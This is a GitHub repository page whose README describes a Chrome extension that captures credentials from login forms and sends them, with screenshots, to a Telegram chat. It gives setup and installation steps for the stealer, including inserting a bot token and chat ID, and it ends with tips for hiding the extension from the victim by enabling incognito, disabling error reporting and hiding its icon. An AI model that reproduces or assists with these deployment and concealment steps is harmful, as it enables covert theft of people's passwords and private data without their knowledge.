Skip to content

A Chrome extension that grabs credentials from login forms and sends them back, with screenshot, to Telegram chat via Bot API

License

Notifications You must be signed in to change notification settings

DigitalDestroyer/keylogger-chrome

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

3 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

keylogger-chrome

A Chrome extension that grabs credentials from login forms and sends them back, with screenshot, to Telegram chat via Bot API.

Name Value
Version First and the last
Language Javascript, English
Browser Chrome
License MIT

Downloading

Copy-paste it in your terminal:

git clone https://github.com/czl3k/keylogger-chrome.git

... or click Clone/Download > Download ZIP, go to your Downloads directory and unpack it.


Setting up

Open main.js with your favourite text editor.

In constant token paste your Telegram bot token.

In constant chatID, paste chat's ID where messages should be sent to. It can be user, group or channel.

Guide how to add custom webpages soon!


Preparing

Open chrome://extensions page and enable Developer Mode in the right top corner. After that, please reload the page.


Installation

First method (easier and faster)

Click Load unpacked option from chrome://extensions page. Choose keylogger's directory.

That's it!

Second method (harder, but recommended)

Go to chrome://extensions and click Pack extension. Select keylogger's directory, path for key please leave empty. Click Pack extension.

After this, .crx file should be created. Now drag-and-drop the .crx file into chrome://extensions and confirm extension installation. You may see "extension is corrupted" error, please skip it and go to the next section.

All done!


Disable annoying extension popups & Extension is corrupted

Every time you open Chrome on (w)indows, browser will ask user to disable extensions in Developer Mode.

In addition, .crx files cannot be installed, browser says they're corrupted.

To solve these problems, please follow this great guide.


Tips & advices...

  • in extension details, there is run in incognito option, turn it on

  • disable Error reporting in extension details

  • hide extension icon (right-click icon > Hide from menu)

Good luck and have fun!


About

A Chrome extension that grabs credentials from login forms and sends them back, with screenshot, to Telegram chat via Bot API

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published